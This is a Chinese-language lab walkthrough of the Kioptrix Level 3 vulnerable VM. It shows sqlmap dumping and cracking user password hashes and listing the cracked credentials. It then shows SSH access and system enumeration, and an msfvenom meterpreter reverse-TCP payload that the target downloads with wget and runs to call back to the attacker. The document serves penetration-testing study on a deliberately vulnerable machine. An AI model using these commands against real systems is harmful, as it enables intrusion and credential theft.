level-3-下集(wget与提权)
sqlmap获取数据库用户密码的hash值。参考
获得信息
用户名:dreg hash值:0d3eccfb887aabd50f243b3f155c0f85
解密后:Mast3r
用户名:loneferret hash值:5badcaf789d3d1d09794d8f021f40f0e
解密后:starwars
sqlmap -u "kioptrix3.com/gallery/gallery.php?id=1" --users
--passwords
::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
:::
:::
然后丢到在线hash破解。https://hashkiller.co.uk/sha1-decrypter.aspx
::: {.image-package index=”1”}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
:::
:::
获取信息2:
用户名:root 解密后密码:fuckeyou
用户名:debian-sys-maint 没有找到hash值对应的密码
ssh登陆:因为在上一篇信息搜集中,已知道开放了22端口,于是可以尝试登陆。管理员有可能使用重复的用户名和密码(图方便)。更方便的是弱密码。。2333
::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
:::
:::
尝试用root / fuckeyou 切换管理员账号,无效。
获取信息3:
file /bin/ls #获得32位系统。
cat /etc/issue #获取到 Ubuntu
8.04,有意思的是还获得了kioptrix小组的免责声明,说不要将此机器放在互联网上,因使用该机器造成的信息丢失等等概不负责。。uname -a #获取到,linux 2.6.24-24-server 内核版本
msfvenom生成攻击载荷,这么说还是有点拗口,不如说生成木马。生成的程序之后要在对方机子上运行,然后我们就可以连接了。
msfvenom -l | grep linux | grep x86
-l (list) 是攻击程序的列表,搜索32位linux的。
msfvenom -p linux/x86/meterpreter_reverse_tcp --payload-options
-p选择payload,攻击载荷;--payload-options查看payload所需参数
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.112
LPORT=999 X > /var/www/html/back.door
kali机需要开启http服务
返回ssh的命令窗口,输入 wget http://攻击机ip/back.door
,成功下载攻击载荷
chomod a+x back.door ,添加可执行权限
先在攻击机运行
::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
:::
:::
然后在ssh命令行./back.door
::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
192.168.1.103是目标主机ip
:::
:::
本地获得meterpreter。在攻击机监听本地ip的999端口,back.door会主动连接kali
linux。
:::
:::
:::